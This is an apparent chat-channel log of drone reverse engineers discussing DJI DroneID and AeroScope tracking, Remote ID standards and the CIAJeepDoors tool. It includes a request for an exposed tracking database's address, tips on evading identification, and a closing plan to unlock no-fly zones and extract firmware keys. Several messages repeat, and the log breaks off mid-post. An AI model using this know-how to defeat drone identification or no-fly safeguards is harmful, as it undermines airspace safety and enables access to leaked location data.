[2022-10-14 08:21:26] hackdji : hackdji joined the channel.

[2022-10-14 08:25:16] fabyo : fabyo joined the channel.

[2022-10-14 08:30:12] loveyou : loveyou joined the channel.

[2022-10-14 15:10:16] cr : k1 joined the channel.

[2022-10-14 19:55:13] cr : Any have answer in new fw for Mavic 3?

[2022-10-14 20:05:57] dereksynkopa : dereksynkopa joined the channel.

[2022-10-14 21:40:07] andrej : https://github.com/proto17/dji_droneid

[2022-10-15 04:28:51] bugalaws : bugalaws joined the channel.

[2022-10-15 12:34:35] dilili : dilili joined the channel.

[2022-10-15 18:13:31] h_marshall : Does anybody have experience of using CIAJD on Matrice M30T with 04.01.0020? I see it was released 2022.06.20 so DJI possibly could disable DUML commands on this fw.

[2022-10-16 11:12:28] mizyazya : mizyazya joined the channel.

[2022-10-16 17:34:36] jaanuke : jaanuke joined the channel.

[2022-10-16 21:02:25] asdrol : asdrol joined the channel.

[2022-10-17 03:47:49] poohtocs : poohtocs joined the channel.

[2022-10-17 06:02:30] enk2022 : anyone has access to DJI's lightbridge patent?

[2022-10-17 12:35:44] orvillep0pc0rnwright : orvillep0pc0rnwright joined the channel.

[2022-10-17 12:47:59] orvillep0pc0rnwright : anyone got the IP of the 54.5GB AeroScope DB exposure?

[2022-10-17 12:48:54] dkovar : It has been closed. Now, is it somewhere else?

[2022-10-17 12:49:49] orvillep0pc0rnwright : ah. this https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/ was last updated Oct 17th but didnt mention it was closed, wondered if still open. if the 54.5GB db is somewhere else also interested

[2022-10-17 12:52:15] dkovar : The vendor was notified by AWS of the breach. I'm fairly certain that the vendor took the appropriate action. Did anyone else find it while it was open? What did the research firm do with it?

[2022-10-17 12:53:16] orvillep0pc0rnwright : > Since the server was hosted on AWS and didn’t have any domains assigned to it, it was impossible for our researchers to track down the owner even with the help of VirusTotal, Centralops Domain dossier, nmap, and dig, among other useful open-source-intelligence (OSINT) tools. Cybernews informed both DJI and AWS about the leaky database for them to fix the issue as soon as possible to reduce the risk of threat actors accessing the dataset. AWS said it had passed our “security concern on to the specific customer for their awareness and potential mitigation.” https://cybernews.com/privacy/dji-drone-tracking-data-exposed-in-us/ "Cybernews Research Team"

[2022-10-17 22:52:02] nickphx : nickphx joined the channel.

[2022-10-18 09:59:41] asdrol : hello! someone tested the cia jeep doors with avata? i m trying to use it but i cant get it work. i am able to see the drone listed on testlibusb but when i try to conmect in bulk mode it says there ks no drone

[2022-10-18 10:00:45] asdrol : and comm_serialtalk doesmt show any message in bulk mode

[2022-10-19 04:29:53] bugalaws : guys someone have the firmwares to erease the 40011 error??

[2022-10-20 15:57:10] creased : creased joined the channel.

[2022-10-21 14:55:45] kil191 : kil191 joined the channel.

[2022-10-25 20:53:50] venom-code : CIAjeepDoors showed my id already disabled without any intervention from my end as such

[2022-10-26 07:17:01] tissy : What drone platform is this on please?

[2022-10-27 01:46:09] il1oo0 : What's your aircraft model

[2022-10-27 06:55:59] crashing_bird : crashing_bird joined the channel.

[2022-10-27 11:59:16] venom-code : its the MP1

[2022-10-27 20:57:27] cs2000 : Some early MP1 firmware versions dont have drone ID enabled, so it would shows as disabled :) I think 0700 was the last one without the code in there, could be wrong though, thats a very old discussion topic :) (still the only drone ive kept over all these years!)

[2022-10-28 03:37:19] n1co : n1co joined the channel.

[2022-10-28 11:42:51] suhas : suhas joined the channel.

[2022-10-29 08:59:25] zboson : zboson joined the channel.

[2022-10-29 17:16:59] bojangles : bojangles joined the channel.

[2022-10-30 03:06:30] bitbangingbytes : hash joined the channel.

[2022-10-30 06:54:41] bob.alki : bob.alki joined the channel.

[2022-10-30 21:44:29] nmikus : @0bswervant

[2022-10-30 21:45:19] nmikus : Anyone know, is this different from aeroscope?

[2022-11-02 03:36:52] bitbangingbytes : RemoteID?

[2022-11-02 16:09:48] digdat0 : Hearing of of errors on mavic 3 after update with DroneID. Is this the future of DroneID? unable to broadcast == no takeoff?

[2022-11-02 17:02:13] konraditurbe : Jesus Christ

[2022-11-02 20:22:06] hostile : hehe sorry bout that.

[2022-11-02 20:38:40] konraditurbe : DJI: *introduces new bugs so they can ship more FW updates to comply with FCC*

[2022-11-02 21:26:06] fredmicrowave : Drone that fly when it wants, or network being mandatory? Time to drop DJI .

[2022-11-02 21:28:24] konraditurbe : who wants to poke at autel next year

[2022-11-03 07:30:23] papalegba : It sounds like they did what Kevin asked them to do.

[2022-11-03 07:30:50] papalegba : What firmware version is this?

[2022-11-03 11:53:25] joonas : it happened: i heard from a retailer that M3s are now shipping with a new FW that blocks CIAJeepDoors from the factory. meaning our friends in UA with their project Olga are shit outta luck.

[2022-11-03 14:54:26] uskve : > "are shit outta luck." Don't think so. The way the conflict is going its going to last for years so patching this whole just means interested parties need to find others things to poke at. Its a constantly evolving game. its just going to advance to a new level: og's already owned the previous one.. Never forget that what might seem morally OK in a warzone could be also done by others in cities; its a hard path to walk and be responsible with informatoin disclosure at the same time forcing manufacturers to *care*.

[2022-11-03 14:54:26] uskve : > "are shit outta luck." Don't think so. The way the conflict is going its going to last for years so patching this hole just means interested parties need to find others things to poke at. Its a constantly evolving game. its just going to advance to a new level: og's already owned the previous one.. Never forget that what might seem morally OK in a warzone could be also done by others in cities; its a hard path to walk and be responsible with informatoin disclosure at the same time forcing manufacturers to *care*.

[2022-11-03 14:54:26] uskve : > "are shit outta luck." Don't think so. The way the conflict is going its going to last for years so patching this hole just means interested parties need to find others things to poke at. Its a constantly evolving game. its just going to advance to a new level: ogs already owned the previous one.. Never forget that what might seem morally OK in a warzone could be also done by others in cities; its a hard path to walk and be responsible with informatoin disclosure at the same time forcing manufacturers to *care*.

[2022-11-03 16:14:45] joonas : oh i'm sure new exploits will emerge eventually. just wanted to spread the word regarding shipments from factory, because many of the people working on it are in this very channel.

[2022-11-03 16:14:45] joonas : oh i'm sure new exploits will emerge eventually. just wanted to spread the word regarding shipments from factory, because many of the people working on it in this very channel.

[2022-11-03 19:04:25] papalegba : This is well-known info, ever since firmware 700 shipped. And it’s my personal mission to make sure my friends in UA are successful. Their drones, anyway. I’ve been at it for over two months now, full-time. And I’m making decent progress.

[2022-11-03 19:04:25] papalegba : This is well-known info, ever since firmware 700 shipped. And it’s my personal mission to make sure my friends in UA are successful. Their drones, anyway. And I’m making decent progress.

[2022-11-03 19:36:49] nmikus : Your goal is finding another way to disable aeroscope?

[2022-11-03 20:41:48] papalegba : That and enabling homebrew software on the drone.

[2022-11-03 23:09:06] konraditurbe : Yeah this is a bad situation, I told Ukrainians in the front who flew Mavic3 to always use a tablet with airplane mode on and no location on DJI Fly 1.2.0, set the quad at least 100m away from where they are, turn it on and go back to the position. And also land far away. That way at least only the Aircraft position is revealed and not the RC position.

[2022-11-03 23:31:00] azerbaijan : Good that dji not calculate approximate rc location by distance according to signal strength and accelerometer/compass data.

[2022-11-04 03:19:23] nmikus : AS originates in the FC I assume, have you found where this is? And if so is the FC code section RW?

[2022-11-04 12:04:36] skyninja : I captured a wifi beacon frame from a Mavic 3. It is different that the DJI drone id messages in a beacon frame of for instance a Mavic Mini. It also does not seem like the FAA/EU direct remote id. Does anybody knows what it is? I redacted the screenshot, because it is a packet I captured in the wild, it is not my drone, so I want to protect that persons privacy.

[2022-11-04 15:55:04] fredmicrowave : I really don´t see where is the point of poking DJI constantly so they have to tighten their security up to a point we are no able to use a drone normally.

[2022-11-05 21:56:17] uskve : point is the "we". it includes guys who think putting drones within 20 meters of a transport airplane is "cool" / "normal".

[2022-11-05 21:57:39] uskve : Some morons cant even handle minimal responsibility

[2022-11-06 13:04:47] fredmicrowave : That´s true, however it sounds like whining to the "cops" or the boss when you see someone else trying to break a rule, and that´s something I hate.

[2022-11-07 10:55:12] azerbaijan : Some morons, driving drunk, why car let engine start without alcohol test?

[2022-11-07 14:13:00] tmbinc : Road Traffic Regulations are a.) mature, b.) well-known, c.) widely enforceable, and d.) have mostly public support/acceptance. Drone laws, however, are still wild-west (there's not a single answer for ~90% of the land around me of whether I'm allowed to fly there or not, even though Europe and especially Germany tends to over- and not underregulate), are not obvious (no signs etc.). Enforcement is not consistent, creating further confusion, and people have _very_ different ideas on how it should be. So, I don't think this is comparable _at all_.

[2022-11-07 14:14:21] tmbinc : I, for one, would love to have very clear no-fly rules. Find an area that's clear and you'd have the right to fly, without risk that someone feels bothered - I'd take that any minute over they gray-area crap we're in today.

[2022-11-07 14:14:31] tmbinc : Even if it greatly increases NFZs

[2022-11-07 14:15:34] tmbinc : Of course all of this is totally irrelevant for war zones.

[2022-11-07 17:33:53] konraditurbe : US FAA implementation isn't half bad, rules are pretty clear, zones are defined in b4ufly app. But yes, here in EU it's a mess.

[2022-11-07 17:34:24] konraditurbe : I just hope I never get caught lol

[2022-11-07 17:35:12] konraditurbe : dilemma: fly over 120m to avoid ground bystander from listening to prop noise || obey 120m ceiling, chances of getting caught are higher.

[2022-11-07 17:36:27] nz-maori : Be aware, new version of Maven for DJI Drones (3.11.6) enables DroneID again (3.11.5 did not)

[2022-11-07 18:06:58] tissy : Any suggestion on how I can test the RemoteID from a DJI in the UK as by default, it’s not turned on. Don’t really fancy a day trip to Europe either.

[2022-11-07 18:07:44] mavic2reverser : I’d really like to see more standardization in remote ID implementations. It doesn’t make sense to me that it’s up to the manufacturer to come up with their own way to meet compliance, just creates fragmentation. Also, why not just extend adsb?

[2022-11-07 18:08:14] mavic2reverser : Maybe these are dumb questions and someone can help explain :)

[2022-11-07 22:47:05] dkovar : Remote ID is a standard and is not up to the manufacture. Adding a few hundred thousand drones to the ADS-B system would have overwhelmed the infrastructure. It was considered.

[2022-11-08 04:03:38] mavic2reverser : The packet format is standard?

[2022-11-08 18:48:51] skyninja : ASTM F3411 Remote ID standard and the ASD-STAN prEN 4709-002 Direct Remote ID standard.

[2022-11-08 20:50:52] jamesmorez23 : jamesmorez23 joined the channel.

[2022-11-08 21:55:58] mavic2reverser : thank you @dkovar and @skyninja ! :)

[2022-11-08 22:12:17] enk2022 : Is there any thing called Ocusync enterprise and how does this differ from the other ocusync versions?

[2022-11-08 22:12:17] enk2022 : Is there any think called Ocusync enterprise and how does this differ from the other ocusync versions?

[2022-11-08 23:25:55] mavic2reverser : Yes there’s an enterprise version and I believe a major difference is the ability to use multiple controllers for hand off and payload controlling (cameras)

[2022-11-08 23:26:26] mavic2reverser : I’m not too familiar though as I don’t have any enterprise drones to play with

[2022-11-09 07:16:06] xiaohuge365 : 你跟个傻逼似的

[2022-11-09 13:13:21] djifans : djifans joined the channel.

[2022-11-10 17:18:24] sharptak : sharptak joined the channel.

[2022-11-11 13:09:39] jorron : jorron joined the channel.

[2022-11-11 15:23:08] vernon : vernon joined the channel.

[2022-11-13 06:56:59] itismo : Hi, I am wondering why I do not see anything in droneid apps like "Drone Scanner" on Android with both my Mavic 3 and Mavic Air 2 with droneid on or off

[2022-11-13 06:58:13] itismo : Also is the broadcasted info from droneid or Aeroscope used by drone jammers to locate the exact position of the drone in the sky or do they detect it via radar ?

[2022-11-13 07:52:37] cr : Hello everyone, I have a question for the authors, has anyone heard of a firmware from Dubai for Maviс 3 with a thermal imager, neo-boosters, which is more stable for radio electronic warfare?

[2022-11-13 08:16:30] tissy : What country are you in?

[2022-11-13 08:20:17] pingspike : @itismo is your phone / device on the compatibility list?

[2022-11-13 10:00:59] itismo : tried 3 phones one of them is Pixel 2 XL which is on the list

[2022-11-13 10:01:37] itismo : i am on 0600 FW M3

[2022-11-13 10:38:28] ref_iw : ref_iw joined the channel.

[2022-11-14 02:29:17] itismo : Does the country make a difference on whether the drone broadcasts or not?

[2022-11-14 03:03:08] nmikus : There is a Japanese version though I am not clear on what the difference is

[2022-11-14 04:39:45] itismo : Japanese version of what?

[2022-11-14 05:10:55] itismo : So, in practice, if I am on a safe firmware that allows turning off remote ID bits then I am safe from both aeroscope and remote ID? they both are affected by same bits?

[2022-11-14 05:11:58] itismo : Also if I am using dronescanner app with the privacy bits turned off, what should I see in opendroneID apps?

[2022-11-14 06:04:34] nmikus : RemoteID

[2022-11-14 06:06:58] nmikus : Aeroscope==RemoteID and yes if you are using a FW that supports cia keep doors you should be safe

[2022-11-14 12:02:49] joonas : as far as i understand that's not quite right. in the general sense yes. but now DJI is adding country specific remoteid implementations in addition to areoscope which was their own standard. afaik none of the firmwares that support eg. the japanese or us remoteid specific stuff also support the privacy bits.

[2022-11-14 14:36:17] dkovar : I do not think that Aeroscope fully equals RemoteID. I'd not count on it, at least.

[2022-11-14 19:31:46] alexmod777 : alexmod777 joined the channel.

[2022-11-15 06:58:32] itismo : I just wanted to confirm if turning off privacy bits also disables remoteid in addition to aeroscope

[2022-11-15 10:11:14] tmbinc : Is there firmware that still supports turning off privacy bits but at the same time support remoteid? (I guess old Mavic3 FW maybe?)

[2022-11-15 12:14:31] joonas : as far as i know the remoteid updated firmwares only appeared after eg. the mavic 3 had been patched, for japan and us. might be wrong though.

[2022-11-16 06:08:57] itismo : we'll see, till now I am very happy with the 0600 firmware

[2022-11-16 08:09:52] itismo : Just wish there would be NFZ unlock for it

[2022-11-18 22:11:03] xchipx : xchipx joined the channel.

[2022-11-18 22:15:29] xchipx : Hi friends, I have just bought a mini3pro today - i used the gui version of ciajeepdoors to try to disable drone ID but it still remains. The thing is , my firmware is old - may 2022 . In theory, it should work ?? thank you

[2022-11-18 22:28:31] xchipx : (my mini3 is not yet activated)

[2022-11-19 19:45:10] anton_anton : anton_anton joined the channel.

[2022-11-19 20:13:38] plugandplaytor : plugandplaytor joined the channel.

[2022-11-22 13:34:28] john.kairos : john.kairos joined the channel.

[2022-11-22 16:17:37] tipev77733 : tipev77733 joined the channel.

[2022-11-22 23:06:20] xchipx : Im going to guess with the silence that its not possible to disable remoteid/droneid on mini3's ..

[2022-11-23 06:39:47] itismo : How do you know it's not disabled? What version of DJI Fly do you use?

[2022-11-23 13:48:49] lpaul : lpaul joined the channel.

[2022-11-26 13:57:35] wera33 : wera33 joined the channel.

[2022-11-30 05:06:40] sambuko : Which mavic 3 firmware support Drone id removing?

[2022-12-02 01:35:59] il1oo0 : It's possible to disable droneID on MINI3

[2022-12-02 07:27:32] oxolot : How?

[2022-12-02 09:01:19] xenoho4122 : xenoho4122 joined the channel.

[2022-12-04 15:20:41] spectrrr30 : spectrrr30 joined the channel.

[2022-12-05 01:34:35] zy1004 : zy1004 joined the channel.

[2022-12-05 08:25:27] prettymuchathrowaway69 : prettymuchathrowaway69 joined the channel.

[2022-12-09 15:49:44] ivar : ivar joined the channel.

[2022-12-09 23:52:59] invender : invender joined the channel.

[2022-12-10 11:05:55] harryemery92 : @oxolot

[2022-12-10 11:06:14] harryemery92 : And running latest firmware on the mini 3

[2022-12-10 11:13:48] harryemery92 : @il1oo0 @oxolot mavic 3 with it running on latest update

[2022-12-10 18:08:19] nmikus : Can you verify drone ID is actually disabled? They may just ignore those bits now

[2022-12-10 22:44:56] harryemery92 : Needs testing on aeroscope

[2022-12-11 10:46:37] vpinch4 : vpinch4 joined the channel.

[2022-12-12 20:06:20] dereksynkopa : Unfortunately, this method doesn't work. The problem is due to a connection error via bulk. File "d:\dji-firmware-tools-master\CIAJeepDoors.py", line 260, in main() File "d:\dji-firmware-tools-master\CIAJeepDoors.py", line 222, in main ser = open_usb(po) File "d:\dji-firmware-tools-master.\comm_serialtalk.py", line 148, in open_usb import usb.core ModuleNotFoundError: No module named 'usb'

[2022-12-15 15:10:52] fredbotton : fredbotton joined the channel.

[2022-12-15 18:28:41] pingspike : can anyone tell me if my understanding is correct as some of the terminology around remote id as a whole is overlapping in my brain I’m in the UK so we don’t have the whole “Remote ID” thing going on here (yet)

[2022-12-15 18:28:46] pingspike : since around 2017 or so (the OG Mavic Pro) all DJI drones have been broadcasting DJI’s proprietary “beacon” (unsure of the correct word to use) that AeroScope can receive and can then reveal the model, serial number, take off co-ords, current position, altitude, etc

[2022-12-15 18:29:01] pingspike : that “beacon” message was, and still is, proprietary to DJI I’ll call it “Drone ID” for this explanation, rather than Remote ID draw a line there, hold that thought :blush:

[2022-12-15 18:29:37] pingspike : now in more recent times, the requirement (from FAA? :shrug: ) is for all drones to broadcast a remote id signal which complies with some open drone id standards meaning you could retrospectively buy and fit a Remote ID module on an old drone

[2022-12-15 18:29:51] pingspike : this remote id signal broadcasts less data, so no drone battery level and other smaller details, but still includes it’s own serial number

[2022-12-15 18:29:54] pingspike : still with me?

[2022-12-15 18:30:03] pingspike : my understanding is that all modern DJI drones are still broadcasting their specific fine-details to any AeroScope within range and in recent firmware updates, as we’ve seen with the Avata, are also broadcasting the open remote id protocol in the relevant countries that require it

[2022-12-15 18:30:13] pingspike : have I got this right? that there are two protocols? one that only DJI use and another that everyone can/will use?

[2022-12-15 19:05:49] quad808 : anyone correct me if I am wrong on this, but yes, I think you are correct. DJI pushed hard for their "Aeroscope-droneid" to be adopted by the FAA, which failed totally. So now they are stuck with this and whatever "permanent" thing the FAA releases. Not sure if they would be granted use of the "Aeroscope-droneid" under a grandfather type exception for their current drones to meet FAA rules going forward. Time will tell.

[2022-12-15 20:26:02] pingspike : yeah that was my understanding too, that they are two very different and separate things

[2022-12-15 21:09:13] sparkyws : So will ciajeepdoors disable both? ?

[2022-12-15 22:53:08] quad808 : Looking at finding more info....good video here: https://www.youtube.com/watch?v=u2ujNdNgdd4 To check what is compliant for DroneID via FAA: https://uasdoc.faa.gov/listDocs From what I can find, looks like FAA is accepting DJI's Aeroscope-droneID as acceptable. Trying to find out if there is a minimum broadcast wattage for FAA's rule of droneID. @sparkyws ciajeepdoors only disables DJI's Aeroscope-Droneid on firmware that supports disabling.

[2022-12-17 09:32:27] vit127549 : vit127549 joined the channel.

[2022-12-18 06:26:20] chasseur : chasseur joined the channel.

[2022-12-20 12:33:17] milenovic : milenovic joined the channel.

[2022-12-21 08:45:30] p_m_r_s : p_m_r_s joined the channel.

[2022-12-21 13:11:44] freakmonk : freakmonk joined the channel.

[2022-12-21 19:41:40] royeiror : royeiror joined the channel.

[2022-12-21 19:57:05] dereksynkopa : As a result of my experiments, I noticed that the Mini 3 pro from the firmware version that I can install, i.e. 1.00.0100, already has Remote ID broadcasting via WIFI. I checked it with the Drone Scanner application. I checked the Remote ID using RM-330 DJIFly 1.9.0 and RC-N1 DJIFLY 1.6.1. Tested under CE and FCC mode in Europe. Same result in both cases. All options in DJIFLY except the required Approximate Location Info were disabled. At the same time, I made a test using mini 2 v.1.3.0000 and here the remote id was unavailable as expected. Unfortunately, DJI is not being honest with users, claiming that remote id is only enabled in the US and Japan for now.

[2022-12-21 21:56:25] wixadal747 : wixadal747 joined the channel.

[2022-12-22 10:40:31] lawesslee : lawesslee joined the channel.

[2022-12-22 14:38:34] tissy : Since DJI have evidently migrated away from Mapbox to MapTiler, I presume that’s why I can no longer get mapping on the Aeroscope CrystalSky. Anyone found a workaround for this please?

[2022-12-24 02:36:50] claudionc : claudionc joined the channel.

[2022-12-26 08:27:39] baxove : derowey371 joined the channel.

[2022-12-26 20:12:57] vadims2.mne : vadims2.mne joined the channel.

[2022-12-27 07:41:34] mr.twich : mr.twich joined the channel.

[2022-12-27 10:36:56] algimantas : algimantas joined the channel.

[2022-12-27 13:37:11] elder : elder joined the channel.

[2022-12-28 02:18:55] griffo77 : griffo77 joined the channel.

[2022-12-28 14:48:12] mavic2reverser : does anyone here have access to the DJI linux SDK for Aeroscope? Curious to poke at it and can't seem to find it anywhere from my google searching

[2022-12-31 14:40:34] efwefaf : efwefaf joined the channel.

[2022-12-31 21:22:22] trueandfalse : spartaksm99 joined the channel.

[2023-01-01 16:24:10] fantom : fantom joined the channel.

[2023-01-01 16:37:15] fantom : but how did you achieve this? Have you used the service firmware, after which you upgraded to 1000? Have you checked that the drone ID is really disabled?

[2023-01-01 17:17:34] trueandfalse : @spartaksm99 left the channel.

[2023-01-02 10:12:38] coldflake : FWIW, I have 10 Aeroscope Mobile that I need to get rid off. They are effing expensive but hit me up with a PM interresred

[2023-01-04 05:19:56] mingtao : Also have in stock 7 pcs sets of Aeroscope G8 .. if any need it PM me. Stored in Kuwait or Saudi Arab

[2023-01-04 05:19:56] mingtao : Also have in stock 7 pcs sets of Aeroscope G8 .. if anyone need it - PM me. Stored in Kuwait or Saudi Arab

[2023-01-04 06:13:04] kaleongo : kaleongo joined the channel.

[2023-01-04 07:25:46] lebangrev : lebangrev joined the channel.

[2023-01-04 19:17:38] gde : gde joined the channel.

[2023-01-04 22:39:10] retrocall : retrocall joined the channel.

[2023-01-05 12:32:36] papalegba : How much?

[2023-01-05 12:33:03] papalegba : Is there a G9 or higher or is this the latest version? How much?

[2023-01-05 19:39:31] aprentis : aprentis joined the channel.

[2023-01-05 19:57:14] dmtr : dmtr joined the channel.

[2023-01-06 19:12:18] johnnokomis : johnnokomis joined the channel.

[2023-01-06 21:03:07] mumbling4450 : mumbling4450 joined the channel.

[2023-01-06 22:37:27] dabeast1234 : dabeast1234 joined the channel.

[2023-01-08 17:33:06] aviationnerd : aviationnerd joined the channel.

[2023-01-09 14:07:19] jandersson : jandersson joined the channel.

[2023-01-11 23:23:59] sparkyws : Would a Dji Mini 3 or any other RID enabled drone be transmitting it's RID if flown in the UK? or anywhere where RID is not required. Is it geo-based enabled?

[2023-01-11 23:23:59] sparkyws : Would a Dji Mini 3 or any other RID enabled drone be transmitting it's RID if flown in the UK? or anywhere where RID is not required. Is it geo-based

[2023-01-12 05:11:51] the_lord : I sent you PM, please check

[2023-01-12 17:05:06] yosa : yosa joined the channel.

[2023-01-14 19:30:51] speatuk : I second this question

[2023-01-14 21:21:51] tissy : DJI drones do not transmit the new RID in the UK or other countries where it is not mandated. For DJI, it is geolocation specific. This does not apply to other manufacturers however.

[2023-01-15 20:22:39] o0raq0o : o0raq0o joined the channel.

[2023-01-16 17:17:35] pingspike : @tissy good to know do you also know if it would transmit RID of there was no GPS available? in other words, is RID on by default or off by default? (before geolocation makes the decision to turn it on or off)

[2023-01-16 17:30:05] loaderbull : I have a feeling it is off by default until sat lock ping, but i can’t verify this.

[2023-01-16 17:44:02] tissy : I believe it only starts to transmit once a GPS lock has been acquired. I will try and clarify. I’m in the UK, so not easy to do off the bat.

[2023-01-16 17:51:43] pingspike : hi from Wigan ??

[2023-01-16 17:52:27] pingspike : we could probably check with some tinfoil?

[2023-01-17 09:04:53] agaff : agaff joined the channel.

[2023-01-19 13:01:39] ginostred : ginostred joined the channel.

[2023-01-19 14:10:49] sicivo3584 : sicivo3584 joined the channel.

[2023-01-20 15:15:06] kruk : kruk joined the channel.

[2023-01-22 14:20:51] dienox : dienox joined the channel.

[2023-01-22 20:40:51] jglx3p : jglx3p joined the channel.

[2023-01-25 13:08:24] skhemnik : skhemnik joined the channel.

[2023-01-25 16:14:46] m4x : m4x joined the channel.

[2023-01-25 16:14:52] pomsta : pomsta joined the channel.

[2023-01-25 16:15:10] pingspike : welcome

[2023-01-25 16:15:16] pomsta : Thanks guys

[2023-01-25 16:29:03] wag-on : mcht joined the channel.

[2023-01-26 05:28:52] kirat : kirat joined the channel.

[2023-01-26 07:01:23] polyanich : polyanich joined the channel.

[2023-01-26 08:35:08] haizeiwang : haizeiwang joined the channel.

[2023-01-26 09:16:22] eddy : Hi boys. After a long time, DroneID (CIA .. ) reactivated itself on Mini2. I still use it the same way, I can't find a causal connection why it happened. I always use the same apk version on a dedicated device isolated from the internet. I still don't know if it was caused by the apk or the drone itself. Did you happen to find a possible reason somewhere in the code? (Time dependency or something else) I know that you can't rely 100% on turning off DroneID, but I'm angry that I can't find the reason.

[2023-01-26 13:25:54] konraditurbe : Maybe there's a daemon that restarts it after N time has passed. I always plug the drone before heading out to check it's disabled.

[2023-01-26 14:38:00] tmbinc : On Mini2 it's a flag that's stored in the FC's trusted storage, so I think FC itself wouldn't set it back.

[2023-01-26 14:38:14] tmbinc : Obviously any other component (incl. app) can send an update to re-enable it.

[2023-01-26 15:02:38] gareb : gareb joined the channel.

[2023-01-26 15:34:00] eddy : Thanks for the information. I had a thought that I added to the drone-hacks forum. Maybe it would be a simplification to start another application before each start.

[2023-01-26 21:56:44] maxdnsff : maxdnsff joined the channel.

[2023-01-27 17:32:16] eddy : I'll answer myself: in my case, Litchi is responsible for the spontaneous reactivation of Drone ID. Since I use it a little, it took me a lot of testing. Specifically now it is version:: v.4.26.2-g. Be alert.

[2023-01-27 17:35:10] baxove : That's correct. I've noticed that too. Older versions of Litchi did not reactivated DroneID.

[2023-01-27 17:41:43] tmbinc : Oh, interesting. I assume since Litchi uses the SDK it's not something intentional of Litchi.

[2023-01-28 13:46:49] lokidokister : lokidokister joined the channel.

[2023-01-28 18:48:22] clanc : clanc joined the channel.

[2023-01-29 07:27:46] david.haluska : david.haluska joined the channel.

[2023-01-29 08:37:55] accountfrompl : accountfrompl joined the channel.

[2023-01-29 23:07:32] sebo212212 : sebo212212 joined the channel.

[2023-01-30 13:54:03] oathk33p3r : oathk33p3r joined the channel.

[2023-01-31 05:52:08] xshl5 : xshl5 joined the channel.

[2023-01-31 06:10:34] jackma : wjydji2022 joined the channel.

[2023-01-31 11:45:06] zuchmir : zuchmir joined the channel.

[2023-02-01 08:24:30] ginostred : Hi everyone, I'm figuring out lightbridge droneID RF characteristics on my Phantom 4 Pro. Unlike ocusync, there are no droneid packets hopping within specific frequency channels, so the droneid has to be embedded in the downlink signal, which AFAIK is encrypted. So, does this means that the droneID data actually has some sort of protection in lightbridge? Then how is it possible for the Aeroscope to retrieve the data?

[2023-02-01 11:11:38] sistor : sistor joined the channel.

[2023-02-01 12:42:28] enigma2 : its not encrypted.

[2023-02-01 13:56:44] ginostred : So it's theoretically possible to sniff the lightbridge video downlink?

[2023-02-02 04:08:08] pagrei : pagrei joined the channel.

[2023-02-02 06:35:48] nikoman : nikoman joined the channel.

[2023-02-03 03:32:46] caspar : caspar joined the channel.

[2023-02-03 03:35:49] zdsam : zdsam joined the channel.

[2023-02-04 10:57:55] eseven : It does not use same channels/freqs...

[2023-02-06 10:50:05] ginostred : What frequencies does it use? I couldn't find any other signals transmitted by the drone in the 2.4/5.8 GHz

[2023-02-06 15:32:06] fedosgad : fedosgad joined the channel.

[2023-02-06 22:22:28] ondrbal : ondrbal joined the channel.

[2023-02-12 09:01:15] dmtstarpilot : Does jeepdoors remove the dji mavic 2 zoom serial number from being seen on aeroscope?

[2023-02-12 09:01:15] dmtstarpilot : Does jeep remove the serial number from being seen on aeroscope?

[2023-02-12 12:40:26] skynet : Now I’m at deep reversing fw & hw of DJI Agras T40 (ag601) drone. I’ve got China-locked version of this bird. What I want: * unlock it from China - to become universal * unlock NFZ (generate certificate) * disable DroneID What I’ve already done: * dumped eMMC card partitions (using EasyJTAG) * did some IDA reversing of their software. * Modified test_dji_imah_fwsig_rebin1.sh to unpack it’s firmware (wm170|wm231|wm232|gl170|pm430|ag500|ag501|ag601|pm320) so it uses PRAK-2020-01 UFIE-2020-04 TBIE-2020-02 keys, but no luck to unpack rtos.img Sys info: Device Name A: full_e1e_ag601 Device Name B: e1e_ag601 Device Board Name: evb2 Architecture ABI: armeabi-v7a Device Platform: e1e Product ID: e1e_ag601 Build Description: full_e1e_ag601-userdebug 6.0 MDB08M 276 test-keys EMMC RPMB is programmed and written 36 times Kernel: console=ttyS0,921600 mem=2048M vmalloc=504M user_debug=255 earlyprintk clk_ignore_unused maxcpus=3 firmware_class.path=/system/lib/modules/imgtec uio_pdrv_genirq.of_id=generic-uio kmemleak=off androidboot.hardware=e1e spidev.bufsiz=8192 mp_state=production print-fatal-signals coherent_pool=0x400000 chip_sn=2015x0000000000000 board_sn=XXXXX0000000X0 production_sn=0000F000F000F00000X0 security=selinux androidboot.selinux=enforcing androidboot.slot_suffix=1 androidboot.android_dt_dir=/proc/device-tree/firmware_a/android/ androidboot.hw_version=00.01.00.00 androidboot.cpu_role=slave rtos_int=70,142,106,107,108,110,165,227,229,230, androidboot.verity=1 androidboot.secure_debug=0 AG601 has FC based on H6 V100 pv7k88.00S-1 Chip with E1E_DEBUG & MCU_DEBUG ports on board. Now stuck where to dig deeper… Now I would like to derive RSA keys to unpack: Trusted Applications (has total 5 of *.ta), rtos.img The ways I see as for now: * DMA Attack to dump all DDR4 ram and reverse unpacked OP-TEE RTOS * reset the RPMB Key and dig into RPMB partition * brute-force RSA keys)) Any suggestions?

[2023-02-12 12:40:26] skynet : Hi! Now I’m at deep reversing fw & hw of DJI Agras T40 (ag601) drone. I’ve got China-locked version of this bird. What I want: * unlock it from China - to become universal * unlock NFZ (generate certificate) * disable DroneID What I’ve already done: * dumped eMMC card partitions (using EasyJTAG) * did some IDA reversing of their software. * Modified test_dji_imah_fwsig_rebin1.sh to unpack it’s firmware (wm170|wm231|wm232|gl170|pm430|ag500|ag501|ag601|pm320) so it uses PRAK-2020-01 UFIE-2020-04 TBIE-2020-02 keys, but no luck to unpack rtos.img Sys info: Device Name A: full_e1e_ag601 Device Name B: e1e_ag601 Device Board Name: evb2 Architecture ABI: armeabi-v7a Device Platform: e1e Product ID: e1e_ag601 Build Description: full_e1e_ag601-userdebug 6.0 MDB08M 276 test-keys EMMC RPMB is programmed and written 36 times Kernel: console=ttyS0,921600 mem=2048M vmalloc=504M user_debug=255 earlyprintk clk_ignore_unused maxcpus=3 firmware_class.path=/system/lib/modules/imgtec uio_pdrv_genirq.of_id=generic-uio kmemleak=off androidboot.hardware=e1e spidev.bufsiz=8192 mp_state=production print-fatal-signals coherent_pool=0x400000 chip_sn=2015x0000000000000 board_sn=XXXXX0000000X0 production_sn=0000F000F000F00000X0 security=selinux androidboot.selinux=enforcing androidboot.slot_suffix=1 androidboot.android_dt_dir=/proc/device-tree/firmware_a/android/ androidboot.hw_version=00.01.00.00 androidboot.cpu_role=slave rtos_int=70,142,106,107,108,110,165,227,229,230, androidboot.verity=1 